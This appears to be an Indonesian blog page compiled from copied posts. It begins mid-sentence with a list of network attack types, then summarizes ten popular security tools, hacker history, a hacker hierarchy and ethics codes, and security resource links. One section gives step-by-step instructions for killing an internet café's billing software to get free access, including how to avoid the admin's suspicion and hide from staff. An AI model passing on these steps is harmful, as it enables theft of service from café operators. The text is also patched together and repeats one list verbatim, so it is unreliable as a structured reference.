untuk memperlambat kinerja server.

6) FPA (Fragmented Packet Attacks)
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
mengandung paket pertama yang isinya berupa informasi bagian utama dari TCP/IP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.

7) E-mail Exploits
Terbagi menjadi lima cara yaitu: mail floods,command
manipulation, transport level attack, malicious code inserting dan social engineering.

Cool DNS and BIND Vulnerabilities
Kesalahan pada BIND sebenarnya bukanlah sesuatu yang baru. Semenjak permulaanya, standar BIND
merupakan target yang paling favorite untuk diserang oleh hackeR. Empat kerawanan
terhadap buffer overflow yang terjadi pada bulan Januari 2003 lalu hanya
beberapa bagian dari kerawanan untuk diexploitasi oleh para hacker agar mendapat akses terhadap
system dan melakukan perintah dengan hak penuh (command execution priviledge).

9) Password Attacks
Password attack adalah tidakan hacker untuk menggambil password orang. Jika password orang diambil maka hacker akan
memiliki kedudukan yang sama dengan orang itu (Jika ia menggunakan orang itu karena passwordnya sudah ia dapat).
Tekhnik mendapatkan passwordnya pun beragam. Kebanyakan tekhnik yang digunakan adalah menebak guessing, brute force,
cracking dan sniffing.

10) Proxy Server Attacks
Karena secure sharing dinonaktifkan, maka hacker memiliki potensi untuk menyerang komputer local dengan trusted network.
contoh dua komputer milik aq dan kamu. Jika firewall di trusted network tidak dikonfigurasikan secara benar, khususnya
untuk memblockinr akses dari luar, Memungkinkan trusted relationship memberikan kepada semua anggota
network kekuasaan akses yang sama di satu dan lain system (dalam network).
Pembuat NMAP melakukan survei 100 tools favorit terhadap pengikut milis nmap-hackers. Sekitar 3,243 user (wogh..) memberikan suaranya untuk tool yang paling mereka gemari. Daftar 100 tool favorit para hacker ini dapat ditemukan jg diInsecured

Dari 100 tool tersebut, berikut dibawah ini adalah 10 tools favorit yang mendapat suara terbanyak sepanjang tahun 2006. Tool tersebut merupakan senjata yang dianggap mutlak diperlukan dalam aktivitas hacking dan sekuriti.

1.Nessus

“Nessus” pertama kali dibuat oleh Renaud Deraison pada tahun 1998 dan disebarkan untuk komunitas internet secara bebas, bermanfaat, ter-update dengan baik serta mudah untuk digunakan.

Nessus adalah sebuah program untuk mencari kelemahan pada sebuah sistem komputer. Menurut situs resminya di Nessustool ini telah digunakan oleh lebih dari 75.000 organisasi dan perusahaan di seluruh dunia.

2.Snort

Snort adalah sebuah IDS, yaitu tool untuk mencegah dan mendeteksi serangan terhadap sistem komputer. Vendor dari snort mengklaim bahwa tool ini telah didownload berjuta-juta kali dari situs mereka. Anda mungkin berminat untuk mencobanya, silahkan download tool ini di snort

3.Kismet

Kismet adalah sebuah tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , menangkap paket dalam sebuah sistem jaringan dan menjadi sebuah IDS (intrusion detection System).

Untuk mencari tahu lebih lanjut mengenai kismet, anda dapat mengunjungi situsKismetWirellestau masuk ke #kismet irc.freenode.net.

4.Metasploit Framework

Metasploit Framework adalah sebuah proyek open source untuk mengembangkan, menguji dan menggunakan kode eksploit. Dibuat dengan bahasa Perl sebagai fondasi dasar dan dan terdiri dari komponen pelengkap yang telah dicompile dengan bahasa C, assembler dan Python. Metasploit Framework dapat berjalan pada sistem operasi UNIX, Linux dan Windows. Keterangan yang lebih detail dapat anda cari di metasploit

5.Netcat

Netcat adalah sebuah tool networking utility yang dapat membaca dan menulis data pada koneksi sebuah jaringan melalui protokol TCP/IP.

Fitur yang terdapat pada Netcat antara lain :

*

Koneksi keluar dan masuk melalui protokol UDP ataupun TCP dengan port yang digunakan..
*

Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)
*

Port scanner, untuk mendeteksi port yang terbuka.
*

Buffered send-mode dan hexdump RFC854 telnet.

6.Hping

Hping merupakan sebuah tool serba guna. Tool ini dapat digunakan untuk menguji kemampuan firewall, mencari port yang terbuka, menguji keamanan jaringan dengan menggunakan berbagai jenis protokol, mendapatkan informasi sistem operasi, mengevaluasi protokol TCP/IP.

7.TCPDump

Tcpdump juga merupakan sebuah sniffer. Admin jaringan menggunakan tool ini untuk memonitor lalu lintas dan menganalisa permasalahan jika terjadi gangguan. Menurut informasi diiepm-stanfordTcpdump menggunakan paket filter dari UNIX BSD untuk meng-capture data(BPF / BSD Packet Filter).BPF menerima salinan dari driver pengirim dan penerima paket.Pengguna tcpdump juga dapat menyaring paket sesuai dengan keinginan.

8. John The Ripper

Sebuah password cracker dari jaman nenek moyang para hacker yang masih menjadi 10 besar tool favorit. Berikut adalah keterangan dari pembuat John The Ripper.

“John the Ripper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak UNIX passwords. It has been tested with Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX”.

9. Cain And Abel

Cain & Abel adalah sebuah tool untuk masalah password. Tool ini dapat mengumpulkan password dengan metode network sniffing, meng-crack password menggunakan Dictionary attack, Brute-Force and Cryptanalysis attacks, merekam pembicaraan VoIP (Voice Over Internet Protocol), meng-crack jaringan wireless, menganalisa trafik dalam jaringan.
oxid

10. WireShark / Ethereal

Wireshark / Ethereal adalah sebuah tool untuk menganalisa protokol jaringan. Fungsinya juga sebagai sebuah sniffer. Memantau lalu lintas internet. Wireshark

dapat berjalan pada Windows, MAC OS X, dan Linux. WireShark

Tertarik? Pelajari dan pahami saja cara penggunaan 10 tool tsb. Kita memang tdk akan semudah itu menjadi hacker hebat hanya dengan mengandalkan 10 tool diatas. Tapi tool2 tsb sudah diakui oleh semua tingkatan Hacker. Kan bisa menjadi tambahan bagi anda2 yang ingin menggeluti sekuriti komputer secara mendalam.

Source:Closer
Tools ini untuk menghack billing. Tools ini hanya berlaku untuk billing diluar STMIK Indo Global Mandiri. Tapi tools ini juga dapat berfungsi sebagai filter Aplikasi di komputer rumah atau kantor sekaligus sebagai securty paling baik bagi administrator yang ingin mengatur qouta setiap user.


Tips penggunaan Hack Billing :
1. Copy Tools kedalam disket atau simpan Tools kedalam Attachment Email.
2. Setelah sampai ke komputer sasaran, untuk tidak curigai admin. Anda dapat melakukan login terlebih dahulu (Connect)
3. Copykan Tools tersebut ke komputer yang akan di hack
4. Jalankan Software dan software akan menampilkan list applikasi apa saja yang sedang proses di dalam komputer tersebut
5. Cari applikasi yang aneh, aplikasi yang tidak dijalankan pada komputer pada umumnya contoh “C:Program FilesBillingBilling.exe” dan sebagainya.
6. Beri Check list pada list box yang telah disediakan, kemudian klik tombol “Start Kill”
7. Cepat Disconnect Billing anda dan tunggu beberapa detik kemudian billing akan keluar .
8. Selamat Menikmati Main Internet Gratis dengan nyaman.
9. Sssttt … jika penjaga menghampiri anda cepat ShutDown komputer anda dan tampilkan wajah tanpa dosa seakan anda hanya numpang duduk disana
10.Jika anda selesai main, anda bisa close Tools tadi truss jalankan billingnya kembali atau langsung shutdown komputernya.
11.Jangan gunakan ini jika hanya untuk chatting atau keperluan yang tidak bermanfaat atau hanya untuk iseng ini hanya untuk jika kepepet, ingat dosa tuch …. !!!

Copy From untukku.com
HACKER

* SEJARAH HACKER

Hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kata hacker pertama kali muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik dari yang telah dirancang bersama. Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer.



* PENGERTIAN HACKER

Hacker adalah sebutan untuk mereka yang memberikan sumbangan yang bermanfaat kepada jaringan komputer, membuat program kecil dan membagikannya dengan orang-orang di Internet. Sebagai contoh : digigumi (Grup Digital) menggunakan teknik teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya, game Chrono Trigger berbahasa Inggris dapat diubah menjadi bahasa Indonesia.



* HIRARKI / TINGKATAN HACKER

1. Elite

Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat

2. Semi Elite

Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.

3. Developed Kiddie

Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

4. Script Kiddie

Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal.

5. Lamer

Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker.



* KODE ETIK HACKER

1. Mampu mengakses komputer tak terbatas dan totalitas.

2. Semua informasi haruslah FREE.

3. Tidak percaya pada otoritas, artinya memperluas desentralisasi.

4. Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi.

5. Mampu membuat seni keindahan dalam computer.

6. Komputer dapat mengubah hidup menjadi lebih baik

7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.

8. Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.

9. Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi computer.

10. Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.
Cracker tidak memiliki kode etik apapun.



* Aturan yang perlu di ikuti seorang hacker seperti di jelaskan oleh Scorpio, yaitu:

1. Hormati pengetahuan & kebebasan informasi.

2. Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.

3. Jangan mengambil keuntungan yang tidak fair dari hack

4. Tidak mendistribusikan & mengumpulkan software bajakan

5. Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh.

6. Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

7. Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.

8. Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.

9. Tidak pernah meng-hack sebuah sistem untuk mencuri uang.


Aturan yang perlu di ikuti seorang hacker seperti di jelaskan oleh Scorpio, yaitu:

1. Hormati pengetahuan & kebebasan informasi.

2. Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.

3. Jangan mengambil keuntungan yang tidak fair dari hack

4. Tidak mendistribusikan & mengumpulkan software bajakan

5. Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh.

6. Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

7. Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.

8. Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.

9. Tidak pernah meng-hack sebuah sistem untuk mencuri uang.

Source:Closer

Rabu, 13 Mei 2009

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.

Source:Closer

Subscribe to RSS Feed Follow me on Twitter!